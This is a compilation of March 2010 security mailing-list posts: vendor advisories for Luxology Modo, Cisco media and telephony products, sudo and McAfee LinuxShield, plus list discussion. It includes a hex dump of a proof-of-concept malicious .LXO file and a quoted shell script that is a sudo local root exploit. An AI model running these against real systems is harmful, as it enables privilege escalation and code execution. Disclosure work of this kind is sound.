CORRECTION: CORE-2009-0913 - Luxology Modo 401 .LXO Integer Overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Timeline corrected. - Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Luxology Modo 401 .LXO Integer Overflow 1. *Advisory Information* Title: Luxology Modo 401 .LXO Integer Overflow Advisory Id: CORE-2009-0913 Advisory URL: http://www.coresecurity.com/content/luxology-modo-lxo-vulnerability Date published: 2010-03-02 Date of last update: 2010-03-02 Vendors contacted: Luxology LLC Release mode: User release 2. *Vulnerability Information* Class: Failure to Sanitize Data into a Different Plane [CWE-74] Impact: Code execution Remotely Exploitable: Yes (client side) Locally Exploitable: No Bugtraq ID: 38460 CVE Name: CVE-2010-0766 3. *Vulnerability Description* Modo 401[2] is an advanced polygon, subdivision surface, modeling, sculpting, 3D painting, animation and rendering package developed by Luxology LLC [3]. The function Swap4 in valet4.dll takes a length and an input buffer and proceeds to reverse DWORDs in the input buffer for proper endianness. In the case of the CHNL subchunk in which passing an invalid length to the Swap4 function would reverse every DWORD in the stack, both reversing SEH pointer near the bottom of the stack AND causing an exception An attacker can take full control of the machine where Luxology Modo 401 is installed by sending a specially crafted .LXO file and enticing the user to open it. 4. *Vulnerable packages* . Luxology Modo 401 - Windows . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* The vendor did not provide fixes or workaround information. To determine if a .LXO is suspicious you could parse the content of the file searching for CHNL subchunk and validate its length. 6. *Credits* This vulnerability was discovered and researched by Diego Juarez and Nadia Rodriguez from Core Security Technologies during Bugweek 2009 [1]. 7. *Technical Description / Proof of Concept Code* The LXO file format is derived from the metaformat for binary files described in "EA IFF 85 Standard for Interchange Format Files."[4] Mainly consisting of chunks and subchunks. While parsing subchunks, the function Swap4 in valet4.dll takes a length and an input buffer and proceeds to reverse DWORDs in the input buffer for proper endianness. A vulnerability was observed in the case of the CHNL subchunk in which passing an invalid length to the Swap4 function would reverse every DWORD in the stack, both reversing SEH pointer near the bottom of the stack AND causing an exception (ie: forcing a call to the now reversed SEH pointer). We belive this condition may be exploitable in some scenarios as long as the address of function __except_handler3 in kernel32.dll has a least significant byte < 0x7F. Proof of concept: Here is a 464 bytes long LXO file demonstrating the issue /- : 46 4F 52 4D-00 00 01 C4-4C 58 4F 42-54 41 47 53 FORM ?-LXOBTAGS 0010: 00 00 00 08-44 65 66 61-75 6C 74 00-4C 41 59 52 ?Default LAYR 0020: 00 00 00 1A-00 00 00 00-00 00 00 00-00 00 00 00 ? 0030: 00 00 00 00-6C 61 79 65-72 6E 61 6D-65 00 50 4E layername PN 0040: 54 53 00 00-00 60 BF 00-00 00 BF 00-00 00 BF 00 TS `+ + + 0050: 00 00 3F 00-00 00 BF 00-00 00 BF 00-00 00 3F 00? + + ? 0060: 00 00 BF 00-00 00 3F 00-00 00 BF 00-00 00 BF 00+ ? + + 0070: 00 00 3F 00-00 00 BF 00-00 00 3F 00-00 00 BF 00? + ? + 0080: 00 00 3F 00-00 00 3F 00-00 00 BF 00-00 00 3F 00? ? + ? 0090: 00 00 3F 00-00 00 3F 00-00 00 BF 00-00 00 3F 00? ? + ? 00A0: 00 00 3F 00-00 00 42 42-4F 58 00 00-00 18 BF 00? BBOX ?+ 00B0: 00 00 BF 00-00 00 BF 00-00 00 3F 00-00 00 3F 00+ + ? ? 00C0: 00 00 3F 00-00 00 50 4F-4C 53 00 00-00 40 46 41? POLS @FA 00D0: 43 45 00 04-00 00 00 01-00 02 00 03-00 04 00 00 CE ? ? ? ? ? 00E0: 00 04 00 05-00 01 00 04-00 01 00 05-00 06 00 02 ? ? ? ? ? ? ? ? 00F0: 00 04 00 03-00 02 00 06-00 07 00 04-00 00 00 03 ? ? ? ? ? ? 0100: 00 07 00 04-00 04 00 04-00 07 00 06-00 05 50 54 ? ? ? ? ?PT 0110: 41 47 00 00-00 1C 53 55-52 46 00 00-00 00 00 01 AG ?SURF ? 0120: 00 00 00 02-00 00 00 03-00 00 00 04-00 00 00 05 ? ? ? ? 0130: 00 00 53 55-52 46 00 00-00 2A 44 65-66 61 75 6CSURF *Defaul 0140: 74 00 00 00-43 4F 4C 52-00 0E 3F 48-C8 8A 3F 48 t COLR ??H+è?H 0150: C8 8A 3F 48-C8 8A 00 00-44 49 46 46-00 06 3F 80 +è?H+è DIFF ??Ç 0160: 00 00 00 00-49 54 45 4D-00 00 00 64-70 6F 6C 79 ITEM dpoly 0170: 52 65 6E 64-65 72 00 06-00 00 00 00-00 03 4C 49 Render ? ?LI 0180: 4E 4B 00 10-70 61 72 65-6E 74 00 00-00 00 00 03 NK ?parent ? 0190: 00 00 00 00-43 48 4E 56-00 22 61 6D-62 43 6F 6C CHNV "ambCol 01A0: 6F 72 00 00-00 02 00 00-00 03 52 00-40 00 00 00 or
Re: Todd Miller Sudo local root exploit discovered by Slouching
Am Mittwoch, den 03.03.2010, 12:03 + schrieb a...@hotmail.com: > Hi Kingcope, > > but if the 'sudoers' file is correctly configured then you would not > have the appropriate sudo permission to run the 'sudoedit' as root. > > of course I'm assuming that the 'sudoers' file has not got the 'run > any command' in it. > > If the sudoers file used is even the default then I would think you would > get some error on the lines of: > > 'Sorry, user is not allowed to execute './sudoedit test' as root on this > machine'. > > Aren't you assuming the the sudoers file has a line in it that allows the > user in question to run the /home/myhome/sudoedit as sudo??? > > Or am I missing something? > > Andy He's talking about a bug in sudo that allows him to run anything named "sudoedit" if he can run commands that are in an alias named "sudoedit" in /etc/sudoers. Jann Horn
Cisco Security Advisory: Cisco Digital Media Player Remote Display Unauthorized Content Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Cisco Security Advisory: Cisco Digital Media Player Remote Display
Unauthorized Content Injection Vulnerability
Advisory ID: cisco-sa-20100303-dmp
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmp.shtml
Revision 1.0
For Public Release 2010 March 03 1600 UTC (GMT)
+-
Summary
===
A vulnerability exists in the Cisco Digital Media Player that could
allow an unauthenticated attacker to inject video or data content into a
remote display.
Cisco has released free software updates that address this
vulnerability. There are no workarounds available to mitigate this
vulnerability.
This additional advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmp.shtml.
Note: This advisory is being released simultaneously with
a multiple vulnerability disclosure advisory that impacts
the Cisco Digital Media Manager. This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmm.shtml.
Affected Products
=
Vulnerable Products
+--
Cisco Digital Media Player versions earlier than 5.2 are affected by
this vulnerability.
Products Confirmed Not Vulnerable
+
No other Cisco products are currently known to be affected by this
vulnerability.
Details
===
Cisco Digital Media Players are IP-based endpoints that can play
high-definition live and on-demand video, motion graphics, web pages,
and dynamic content on digital displays. The Cisco Digital Media Player
contains a vulnerability that could allow an unauthenticated attacker to
inject video or data content into a remote display.
This vulnerability is documented in Cisco Bug ID CSCtc46024 and has
been assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2010-0573.
Vulnerability Scoring Details
=
Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding CVSS
at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCtc46024 ("Remote Display Unauthorized Content Injection")
CVSS Base Score - 8.5
Access Vector -Network
Access Complexity -Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - Partial
Availability Impact - Complete
CVSS Temporal Score - 7.0
Exploitability - Functional
Remediation Level -Official-Fix
Report Confidence -Confirmed
Impact
==
Successful exploitation of the vulnerability could allow an
unauthenticated attacker to inject video or data content into a remote
display.
Software Versions and Fixes
===
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
This vulnerability has been fixed in Cisco Digital Media Player version
5.2.
Workarounds
===
There are no workarounds to mitigate this vulnerability.
Obtaining Fixed Software
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact ps...@cisco.com or security-al...@cisco.com for
software upgrades.
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Digital Media Manager
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Digital
Media Manager
Advisory ID: cisco-sa-20100303-dmm
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmm.shtml
Revision 1.0
For Public Release 2010 March 03 1600 UTC (GMT)
+-
Summary
===
Multiple vulnerabilities exist in the Cisco Digital Media Manager
(DMM). This security advisory outlines details of the following
vulnerabilities:
* Default credentials
* Privilege escalation vulnerability
* Information leakage vulnerability
These vulnerabilities are independent of each other.
There are no workarounds that can mitigate any of these vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmm.shtml.
Note: This advisory is being released simultaneously with
a vulnerability disclosure advisory that impacts the
Cisco Digital Media Player. This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmp.shtml.
Affected Products
=
Vulnerable Products
+--
The following is a list of the products affected by each vulnerability
as described in detail within this advisory.
Default Credentials
+--
Cisco DMM versions 5.0.x and 5.1.x are affected by this vulnerability.
Cisco DMM versions 4.x are not vulnerable.
Privilege Escalation Vulnerability
+-
Cisco DMM versions 5.0.x and 5.1.x are affected by this vulnerability.
Cisco DMM versions 4.x are not vulnerable.
Information Leakage Vulnerability
+
All Cisco DMM releases earler than 5.2 are affected by this
vulnerability.
Products Confirmed Not Vulnerable
+
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
===
The Cisco DMM is used to manage, schedule, and publish digital media for
Cisco Digital Signs, Cisco Cast and Cisco Show and Share. This security
advisory describes multiple distinct vulnerabilities in the Cisco DMM.
These vulnerabilities are independent of each other.
Default Credentials
+--
Cisco DMM versions earler than 5.2 have default credentials that could
allow an attacker full control of the installed web applications,
including settings, status, and deployment.
This vulnerability is documented in Cisco Bug ID CSCta03378 and has
been assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2010-0570.
Privilege Escalation Vulnerability
+-
A vulnerability exists in Cisco DMM versions 5.0.x and 5.1.x that could
allow authenticated, but unauthorized users to change the configuration
and obtain full access of the device.
This vulnerability is documented in Cisco Bug ID CSCtc46008 and has
been assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2010-0571.
Information Leakage Vulnerability
+
The Cisco DMM can be used to manage the Cisco Digital Media Player.
The Cisco Digital Media Player is an IP-based endpoint that can play
high-definition live and on-demand video, motion graphics, web pages,
and dynamic content on digital displays.
A vulnerability exists in all Cisco DMM versions earler than 5.2 that
could allow authenticated but unauthorized users to view Cisco Digital
Media Player user credentials and LDAP credentials (if configured) in
error log messages and stack traces.
This vulnerability is documented in Cisco Bug ID CSCtc46050 and has
been assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2010-0572.
Vulnerability Scoring Details
=
Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding CVSS
at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCta03378 ("Default password for Tomcat administration account")
CVSS Base Score - 10.0
Access Vector -Network
Access Complexity -Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Expl
[ GLSA 201003-01 ] sudo: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201003-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: sudo: Privilege escalation Date: March 03, 2010 Bugs: #306865 ID: 201003-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Two vulnerabilities in sudo might allow local users to escalate privileges and execute arbitrary code with root privileges. Background == sudo allows a system administrator to give users the ability to run commands as other users. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-admin/sudo < 1.7.2_p4 >= 1.7.2_p4 Description === Multiple vulnerabilities have been discovered in sudo: * Glenn Waller and neonsignal reported that sudo does not properly handle access control of the "sudoedit" pseudo-command (CVE-2010-0426). * Harald Koenig reported that sudo does not properly set supplementary groups when using the "runas_default" option (CVE-2010-0427). Impact == A local attacker with privileges to use "sudoedit" or the privilege to execute commands with the "runas_default" setting enabled could leverage these vulnerabilities to execute arbitrary code with elevated privileges. Workaround == CVE-2010-0426: Revoke all "sudoedit" privileges, or use the full path to sudoedit. CVE-2010-0427: Remove all occurrences of the "runas_default" setting. Resolution == All sudo users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.7.2_p4" References == [ 1 ] CVE-2010-0426 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426 [ 2 ] CVE-2010-0427 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201003-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
Re: Todd Miller Sudo local root exploit discovered by Slouching
Hello Andy, I am referring to the following forum posts. http://www.linuxquestions.org/questions/linux-security-4/the-use-of-sudoedit-command-question-785442/ /kcope Am Mittwoch, den 03.03.2010, 12:03 + schrieb a...@hotmail.com: > Hi Kingcope, > > but if the 'sudoers' file is correctly configured then you would not > have the appropriate sudo permission to run the 'sudoedit' as root. > > of course I'm assuming that the 'sudoers' file has not got the 'run > any command' in it. > > If the sudoers file used is even the default then I would think you would > get some error on the lines of: > > 'Sorry, user is not allowed to execute './sudoedit test' as root on this > machine'. > > Aren't you assuming the the sudoers file has a line in it that allows the > user in question to run the /home/myhome/sudoedit as sudo??? > > Or am I missing something? > > Andy > > On Tue, 2 Mar 2010, Kingcope wrote: > > > Just for the record. > > > > ---snip--- > > #!/bin/sh > > # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 > > # local root exploit > > # March 2010 > > # automated by kingcope > > # Full Credits to Slouching > > echo Tod Miller Sudo local root exploit > > echo by Slouching > > echo automated by kingcope > > if [ $# != 1 ] > > then > > echo "usage: ./sudoxpl.sh " > > exit > > fi > > cd /tmp > > cat > sudoedit << _EOF > > #!/bin/sh > > echo ALEX-ALEX > > su > > /bin/su > > /usr/bin/su > > _EOF > > chmod a+x ./sudoedit > > sudo ./sudoedit $1 > > --snip--- > > > > cheers, > > kingcope > > >
Re: Todd Miller Sudo local root exploit discovered by Slouching
Hi Kingcope, but if the 'sudoers' file is correctly configured then you would not have the appropriate sudo permission to run the 'sudoedit' as root. of course I'm assuming that the 'sudoers' file has not got the 'run any command' in it. If the sudoers file used is even the default then I would think you would get some error on the lines of: 'Sorry, user is not allowed to execute './sudoedit test' as root on this machine'. Aren't you assuming the the sudoers file has a line in it that allows the user in question to run the /home/myhome/sudoedit as sudo??? Or am I missing something? Andy On Tue, 2 Mar 2010, Kingcope wrote: > Just for the record. > > ---snip--- > #!/bin/sh > # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 > # local root exploit > # March 2010 > # automated by kingcope > # Full Credits to Slouching > echo Tod Miller Sudo local root exploit > echo by Slouching > echo automated by kingcope > if [ $# != 1 ] > then > echo "usage: ./sudoxpl.sh " > exit > fi > cd /tmp > cat > sudoedit << _EOF > #!/bin/sh > echo ALEX-ALEX > su > /bin/su > /usr/bin/su > _EOF > chmod a+x ./sudoedit > sudo ./sudoedit $1 > --snip--- > > cheers, > kingcope >
Re: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
ACK! You can find user which can login to the web interface with this trick. Am 03.03.2010 09:14, schrieb Veal, Richard: > > I believe there could also be a remote user enumeration using this > service - when attempting to log into the web interface using a > non-valid username / any password you get "Error: bad credentials" but > when attempting to log with a valid username / invalid password you seem > to get: > > "Error: bad credentials > Error Information > Error CodeDescription > 34authentication failure" > > Version 1.5.1, anyone confirm? Has this been mentioned before? > > > Rich > > > > -Original Message- > From: NSO Research [mailto:nso-resea...@sotiriu.de] > Sent: 02 March 2010 21:30 > To: bugtraq@securityfocus.com > Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution > > __ > > NSOADV-2010-004: McAfee LinuxShield remote/local code execution > __ > __ > >0 > 1 00110 0011000 >11 01 01 1 10 > 1 0 11 01 0 11 1 1 111011001 > 101 1 11 0110111 110 >1001 0 1 10 11 0 10 11 111 1 111 111001 > 1 0 10 0 11 11 1 1 1101 10 > 00111 0 0 11 00 0 1110 1 10111 111 11 100 >1011 0 01 0 1 1 10 11 1 011 >00 0110 1110 1 0 11101011 11100 00 >0 0 10 1110 1 01 1 1101 01 >01110 0 10 10 110 0 111010101 > 11 11 0 0 1 1 1 1 1101 111 > 10110 10 010 1 0 0 1 110 > 111 1 1 1 111 1 10011 10110 0 1100 >111 10 110 10100010 111 11 0011100 >11 10 001100 0001 11 10 11 0 > 0 00100 1 10 1 101010001 > 111010 1011 100100 111001101 0 > 0110 111011011 0110 10001101 0 > 1011 1 10 101 0101 00 >1010 1 11001 1 1101 10 > 110101011 0 101 0 > 11011 > 111 > __ > __ > > Title: McAfee LinuxShield remote/local code > execution > Severity: Medium > Advisory ID:NSOADV-2010-004 > Found Date: 07.12.2009 > Date Reported: 05.02.2010 > Release Date: 02.03.2010 > Author: Nikolas Sotiriu (lofi) > Website:http://sotiriu.de > Twitter:http://twitter.com/nsoresearch > Mail: nso-research at sotiriu.de > URL:http://sotiriu.de/adv/NSOADV-2010-004.txt > Vendor: McAfee (http://www.mcafee.com/) > Affected Products: McAfee LinuxShield <= 1.5.1 > Not Affected Products: McAfee LinuxShield 1.5.1 with HF550192 > Remote Exploitable: Yes (attacker must be authenticated) > Local Exploitable: Yes > Patch Status: Vendor released a patch (See Solution) > Discovered by: Nikolas Sotiriu > Thanks to: Thierry Zoller: For the permission to use his > Policy > > > Background: > === > > LinuxShield detects and removes viruses and other potentially unwanted > software on Linux-based systems. LinuxShield uses the powerful McAfee > scanning engine - the engine common to all our anti-virus products. > > Although a few years ago, the Linux operating system was considered a > secure environment, it is now seeing more occurrences of software > specifically written to attack or exploit security weaknesses in > Linux-based systems. Increasingly, Linux-based systems interact with > Windows-based computers. Although viruses written to attack Windows- > based systems do not directly attack Linux systems, a Linux server can > harbor these viruses, ready to infect any client that connects to it. > > When installed on your Linux systems, LinuxShield provides protection > against viruses, Trojan horses, and other types of potentially unwanted > software. > > LinuxShield scans files as they are opened and closed - a technique > known as on-access scanning. LinuxShield also incorporates an on-demand > scanner that enables you to scan any directory or file in your host a
RE: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
I believe there could also be a remote user enumeration using this service - when attempting to log into the web interface using a non-valid username / any password you get "Error: bad credentials" but when attempting to log with a valid username / invalid password you seem to get: "Error: bad credentials Error Information Error Code Description 34 authentication failure" Version 1.5.1, anyone confirm? Has this been mentioned before? Rich -Original Message- From: NSO Research [mailto:nso-resea...@sotiriu.de] Sent: 02 March 2010 21:30 To: bugtraq@securityfocus.com Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution __ NSOADV-2010-004: McAfee LinuxShield remote/local code execution __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: McAfee LinuxShield remote/local code execution Severity: Medium Advisory ID:NSOADV-2010-004 Found Date: 07.12.2009 Date Reported: 05.02.2010 Release Date: 02.03.2010 Author: Nikolas Sotiriu (lofi) Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-004.txt Vendor: McAfee (http://www.mcafee.com/) Affected Products: McAfee LinuxShield <= 1.5.1 Not Affected Products: McAfee LinuxShield 1.5.1 with HF550192 Remote Exploitable: Yes (attacker must be authenticated) Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Thanks to: Thierry Zoller: For the permission to use his Policy Background: === LinuxShield detects and removes viruses and other potentially unwanted software on Linux-based systems. LinuxShield uses the powerful McAfee scanning engine - the engine common to all our anti-virus products. Although a few years ago, the Linux operating system was considered a secure environment, it is now seeing more occurrences of software specifically written to attack or exploit security weaknesses in Linux-based systems. Increasingly, Linux-based systems interact with Windows-based computers. Although viruses written to attack Windows- based systems do not directly attack Linux systems, a Linux server can harbor these viruses, ready to infect any client that connects to it. When installed on your Linux systems, LinuxShield provides protection against viruses, Trojan horses, and other types of potentially unwanted software. LinuxShield scans files as they are opened and closed - a technique known as on-access scanning. LinuxShield also incorporates an on-demand scanner that enables you to scan any directory or file in your host at any time. When kept up-to-date with the latest virus-definition (DAT) files, LinuxShield is an important part of your network security. We recommend that you set up an anti-virus security policy for your network, incorporating as many protective measures as possible. LinuxShield uses a web-browser interface, and a large n
Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service Vulnerabilities Advisory ID: cisco-sa-20100303-cucm Revision 1.0 For Public Release 2010 March 3 1600 UTC (GMT) +- Summary === Cisco Unified Communications Manager (formerly Cisco CallManager) contains multiple denial of service (DoS) vulnerabilities that if exploited could cause an interruption of voice services. The Session Initiation Protocol (SIP), Skinny Client Control Protocol (SCCP) and Computer Telephony Integration (CTI) Manager services are affected by these vulnerabilities. To address these vulnerabilities, Cisco has released free software updates for select Cisco Unified Communications Manager versions. There is a workaround for of one the vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20100303-cucm.shtml Affected Products = Vulnerable Products +-- The following products are affected by vulnerabilities that are described in this advisory: * Cisco Unified Communications Manager 4.x * Cisco Unified Communications Manager 5.x * Cisco Unified Communications Manager 6.x * Cisco Unified Communications Manager 7.x Note: Cisco Unified Communications Manager version 5.1 reached the End of Software Maintenance on February 13, 2010. For customers using Cisco Unified Communications Manager 5.x versions, please contact your Cisco support team for assistance in upgrading to a supported version of Cisco Unified Communications Manager. Products Confirmed Not Vulnerable + Cisco Unified Communications Manager version 8.0(1) and Cisco Unified Communications Manager Express are not affected by these vulnerabilities. No other Cisco products are currently known to be affected by these vulnerabilities. Details === Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, VoIP gateways, and multimedia applications. Malformed SCCP Message Vulnerabilities +- Cisco Unified Communications Manager contains two DoS vulnerabilities that involve the processing of SCCP packets. Each vulnerability is triggered by a malformed SCCP message that could cause a critical process to fail, which could result in the disruption of voice services. All SCCP ports (TCP ports 2000 and 2443) are affected. The first SCCP DoS vulnerability is documented in Cisco Bug ID CSCtc38985 and has been assigned the CVE identifier CVE-2010-0587. This vulnerability is fixed in Cisco Unified Communications Manager versions 4.3(2)SR2, 6.1(5), 7.1(3a)su1 and 8.0(1). The second SCCP DoS vulnerability is documented in Cisco Bug ID CSCtc47823 and has been assigned the CVE identifier CVE-2010-0588. This vulnerability is fixed in Cisco Unified Communications Manager versions 6.1(5), 7.1(3a)su1 and 8.0(1). Cisco Unified Communications Manager 4.x versions are not affected. Malformed SIP Message Vulnerabilities + Cisco Unified Communications Manager contains two DoS vulnerabilities that involve the processing of SIP messages. Each vulnerability is triggered by a malformed SIP message that could cause a critical process to fail, which could result in the disruption of voice services. All SIP ports (TCP ports 5060 and 5061, UDP ports 5060 and 5061) are affected. The first SIP DoS vulnerability is documented in Cisco Bug ID CSCtc37188 and has been assigned the CVE identifier CVE-2010-0590. This vulnerability is fixed in Cisco Unified Communications Manager versions 7.1(3a)su1 and 8.0(1) . Cisco Unified Communications Manager 4.x and 6.x versions are not affected. The second SIP DoS vulnerability is documented in Cisco Bug ID CSCtc62362 and has been assigned the CVE identifier CVE-2010-0591. The second vulnerability is fixed in Cisco Unified Communications Manager versions 6.1(5), 7.1(3b)SU2 and 8.0(1). Cisco Unified Communications Manager 4.x versions are not affected. Malformed CTI Manager Message Vulnerability +-- The CTI Manager service of Cisco Unified Communications Manager contains a DoS vulnerability. A malformed message sent to the CTI Manager service port (TCP 2748) could cause the CTI Manager service to fail, which could result in the interruption of CTI applications. The CTI Manager service is disabled by default. The CTI Manager vulnerability is documented in Cisco Bug ID CSCsu31800 and has been assigned the CVE identifier CVE-2010-0592. This vulnerability is fixed in Cisco Unified Communications Manager versions 4.3(2)sr1a, 6.1(3), 7.0(2), 7.1(2) and 8.0(1). Vulnerability Scoring Details
